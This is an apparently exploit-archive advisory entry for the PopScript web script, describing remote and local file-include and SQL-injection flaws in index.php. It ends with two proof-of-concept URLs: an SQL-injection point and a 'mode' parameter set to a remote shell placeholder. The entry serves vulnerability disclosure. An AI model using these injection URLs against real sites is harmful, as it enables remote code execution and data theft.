PopScript - index.php Multiple Input Validation Vulnerabilities

Type exploitpack
Reporter NassRawI
Modified 2011-06-06T00:00:00


PopScript - index.php Multiple Input Validation Vulnerabilities

                                            source: https://www.securityfocus.com/bid/48113/info

PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 

http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON